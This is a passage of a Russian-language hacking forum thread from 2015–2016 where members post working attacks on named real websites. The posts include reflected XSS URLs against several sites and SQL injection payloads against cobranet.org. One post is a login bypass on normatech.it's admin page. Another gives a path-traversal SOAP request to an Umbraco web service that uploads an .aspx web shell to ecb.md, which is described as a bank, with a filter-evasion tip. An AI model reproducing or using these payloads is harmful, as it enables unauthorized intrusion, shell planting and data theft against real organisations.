HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #102  
Старый 28.11.2015, 17:22
ubepkr
Guest
Сообщений: n/a
Провел на форуме:
32618

Репутация: 1
По умолчанию

Сайт: http://www.academyplazahotel.ie/

Уязвимость: Reflected XSS

Код:
Code:
http://www.academyplazahotel.ie/booknow.php?bg=FFFFFF&color='"-->alert(1234567890)
Сайт: http://www.cleanrooms-ireland.ie

Уязвимость: Reflected XSS

Код:
Code:
http://www.cleanrooms-ireland.ie/w/link.cfm?w_y=4&w_u='"-->alert(1234567890)
там же: (?redirect?)

Код:
Code:
http://www.cleanrooms-ireland.ie/w/llink.cfm?w_y=4&w_u=http://google.com
Сайт: http://forums.somethingawful.com

Уязвимость: Reflected XSS

Код:
Code:
http://forums.somethingawful.com/account.php?action=loginform&next=/member.php"()%26%25alert(1234567890)
Сайт: http://www.zoommoola.com

Уязвимость: Reflected XSS

Код:
Code:
http://www.zoommoola.com/?ref='"-->alert(1234567890)
Сайт: http://www.usatestprep.com

Уязвимость: Reflected XSS

Код:
Code:
http://www.usatestprep.com/modules/map/_brains/map_product.php?id=&page=landing'"()&%alert(123456)
Сайт: http://txbra.org

Уязвимость: XSS

Код:
Code:

        
        
    
     HTMLFormElement.prototype.submit.call(document.forms[0]);
 
Ответить с цитированием

  #103  
Старый 02.12.2015, 15:15
Jup1ter_
Guest
Сообщений: n/a
Провел на форуме:
5275

Репутация: 6
По умолчанию

 
Ответить с цитированием

  #104  
Старый 21.12.2015, 14:15
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

актуален, времени пока нет разгрести. позже всем добавлю
 
Ответить с цитированием

  #105  
Старый 31.12.2015, 20:41
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Remote Code Execution

Сайт: ecb.md

Эксплоит:

Код:
Code:
POST /umbraco/webservices/codeEditorSave.asmx HTTP/1.1
SOAPAction: "http://tempuri.org/SaveDLRScript"
Content-Type: text/xml
Host: ecb.md
Content-Length: 710
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

    
        
            /..\\..\\..\\umbraco\\shell.aspx
            string
            

Код шелла .aspx,в burpsuite выбираем
Convert selection->Html->Html encode key characters
так прошел через фильтрацию

            1
Заливается тут ecb.md/umbraco/shell.aspx
 
Ответить с цитированием

  #106  
Старый 01.01.2016, 01:15
chatanti
Guest
Сообщений: n/a
Провел на форуме:
10237

Репутация: 0
По умолчанию

зашел на ecb.md, стало страшно, ушел)
 
Ответить с цитированием

  #107  
Старый 01.01.2016, 01:19
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Цитата:
Сообщение от chatanti  
chatanti said:

зашел на ecb.md, стало страшно, ушел)
Месныи банк )
 
Ответить с цитированием

  #108  
Старый 04.01.2016, 16:00
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от AAI  
AAI said:

Сайт:
http://www.cobranet.org/
Уязвимость: SQL injection
Код:
Code:
http://www.cobranet.org/about.php?id=1+union+select+1,2,3,4,5,6
к сожалению дальше не раскрутил.
Вы уже всё сделали

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.cobranet.org/about.php?id=1+union+select+1,database(),3,user(),5,6+--+-[/COLOR][/COLOR] 
 
Ответить с цитированием

  #109  
Старый 04.01.2016, 19:07
AAI
Guest
Сообщений: n/a
Провел на форуме:
3616

Репутация: 1
По умолчанию

Сайт: www.normatech.it/login-admin.asp

Уязвимость:SQL injection

Код:
Code:
login: ' or '1'='1
pass: ' or '1'='1
 
Ответить с цитированием

  #110  
Старый 06.01.2016, 12:12
R3hab
Guest
Сообщений: n/a
Провел на форуме:
31545

Репутация: 6
По умолчанию

AAI,

.SpoilerTarget" type="button">Spoiler
SQL Инъекции1

SQL Инъекции2
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ